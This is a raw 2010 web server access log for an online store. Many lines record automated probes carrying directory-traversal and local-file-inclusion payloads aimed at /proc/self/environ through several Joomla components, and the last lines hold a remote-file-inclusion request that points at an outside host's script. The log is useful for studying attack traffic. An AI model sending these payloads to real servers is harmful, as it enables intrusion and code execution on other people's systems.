211.43.212.56 - - [21/Jun/2010:00:24:57 -0400] "GET /logs/access_log.Q110030500//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:25:01 -0400] "GET /logs/access_log.Q109070700//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:25:02 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:25:02 -0400] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
69.73.166.6 - - [21/Jun/2010:00:25:08 -0400] "GET /logs/access_log.Q109053100/errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.832"
220.181.7.76 - - [21/Jun/2010:00:25:21 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
69.73.166.6 - - [21/Jun/2010:00:25:28 -0400] "GET /logs/access_log.Q109060200/?step=1&vwar_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.832"
211.43.212.56 - - [21/Jun/2010:00:25:31 -0400] "GET /logs/access_log.Q109090300//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:25:37 -0400] "GET /logs/access_log.Q109090300//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:25:50 -0400] "GET /logs/access_log.Q109070700//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:25:50 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:25:51 -0400] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
66.249.71.50 - - [21/Jun/2010:00:26:14 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LG28ABC5372E630006CB300L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.43.212.56 - - [21/Jun/2010:00:26:24 -0400] "GET /logs/access_log.Q110051300//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
91.121.20.205 - - [21/Jun/2010:00:26:48 -0400] "GET /logs/error_log.Q110011300//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
91.121.20.205 - - [21/Jun/2010:00:26:50 -0400] "GET //index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
91.121.20.205 - - [21/Jun/2010:00:26:50 -0400] "GET /logs//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
91.121.20.205 - - [21/Jun/2010:00:26:54 -0400] "GET /logs/error_log.Q110011300//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
91.121.20.205 - - [21/Jun/2010:00:26:54 -0400] "GET //index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
91.121.20.205 - - [21/Jun/2010:00:26:54 -0400] "GET /logs//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
91.121.20.205 - - [21/Jun/2010:00:27:10 -0400] "GET /logs/access_log.Q110011300//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
91.121.20.205 - - [21/Jun/2010:00:27:14 -0400] "GET /logs/access_log.Q110011300//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
211.43.212.56 - - [21/Jun/2010:00:27:18 -0400] "GET /logs/access_log.Q110051300//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
91.121.20.205 - - [21/Jun/2010:00:27:39 -0400] "GET /logs/error_log.Q110011300//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
91.121.20.205 - - [21/Jun/2010:00:27:40 -0400] "GET //index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
91.121.20.205 - - [21/Jun/2010:00:27:40 -0400] "GET /logs//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
211.43.212.56 - - [21/Jun/2010:00:27:57 -0400] "GET /logs/access_log.Q110053100//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:27:58 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:27:58 -0400] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
91.121.20.205 - - [21/Jun/2010:00:28:01 -0400] "GET /logs/access_log.Q110011300//index.php?option=com_quran&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
201.36.173.93 - - [21/Jun/2010:00:28:46 -0400] "GET /logs/access_log.Q110053000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
201.36.173.93 - - [21/Jun/2010:00:28:49 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
201.36.173.93 - - [21/Jun/2010:00:28:49 -0400] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.831"
188.72.70.56 - - [21/Jun/2010:00:29:05 -0400] "GET /logs/error_log.Q110060500//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:29:06 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:29:06 -0400] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:29:07 -0400] "GET /logs/error_log.Q110060500//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:29:07 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:29:08 -0400] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:29:11 -0400] "GET /logs/error_log.Q110060700//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:29:11 -0400] "GET /logs/error_log.Q110060700//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
220.181.7.45 - - [21/Jun/2010:00:29:32 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
211.43.212.56 - - [21/Jun/2010:00:30:18 -0400] "GET /logs/error_log.Q110053100//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.822"
201.36.173.93 - - [21/Jun/2010:00:30:35 -0400] "GET /logs/error_log.Q110053000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.831"
209.200.245.35 - - [21/Jun/2010:00:31:45 -0400] "GET /logs/error_log.Q110011300//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
209.200.245.35 - - [21/Jun/2010:00:31:45 -0400] "GET /logs/error_log.Q110011300//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
209.200.245.35 - - [21/Jun/2010:00:31:47 -0400] "GET //index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
209.200.245.35 - - [21/Jun/2010:00:31:47 -0400] "GET //index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
209.200.245.35 - - [21/Jun/2010:00:31:47 -0400] "GET /logs//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
209.200.245.35 - - [21/Jun/2010:00:31:47 -0400] "GET /logs//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
209.200.245.35 - - [21/Jun/2010:00:31:49 -0400] "GET /logs/access_log.Q110011300//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
209.200.245.35 - - [21/Jun/2010:00:31:49 -0400] "GET /logs/access_log.Q110011300//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
209.59.12.99 - - [21/Jun/2010:00:31:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.101.64.67 - - [21/Jun/2010:00:32:59 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:32:59 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:03 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:03 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:09 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402 HTTP/1.1" 200 38020 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:11 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:11 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:11 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:12 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:12 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:12 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:13 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:13 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:13 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:13 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:14 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:14 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:14 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:14 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:15 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:15 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:15 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:15 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:16 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:16 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:16 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:17 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:17 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:17 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:18 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:18 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LJ237E36D03A4C500743C08L+M37+ENG HTTP/1.1" 200 77265 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):003-1402" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:20 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LJ237E36D03A4C500743C08L+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:20 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LJ237E36D03A4C500743C08L+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:33:20 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LJ237E36D03A4C500743C08L+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
67.227.132.232 - - [21/Jun/2010:00:33:25 -0400] "GET /logs/error_log.Q110011300//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
67.227.132.232 - - [21/Jun/2010:00:33:25 -0400] "GET /logs/error_log.Q110011300//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
67.227.132.232 - - [21/Jun/2010:00:33:25 -0400] "GET //index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
67.227.132.232 - - [21/Jun/2010:00:33:25 -0400] "GET //index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
67.227.132.232 - - [21/Jun/2010:00:33:25 -0400] "GET /logs//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
67.227.132.232 - - [21/Jun/2010:00:33:25 -0400] "GET /logs//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
67.227.132.232 - - [21/Jun/2010:00:33:46 -0400] "GET /logs/access_log.Q110011300//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
67.227.132.232 - - [21/Jun/2010:00:33:47 -0400] "GET /logs/access_log.Q110011300//index.php?option=com_quran../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
85.235.154.15 - - [21/Jun/2010:00:34:04 -0400] "GET /logs/access_log.Q109101300%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:00:34:04 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
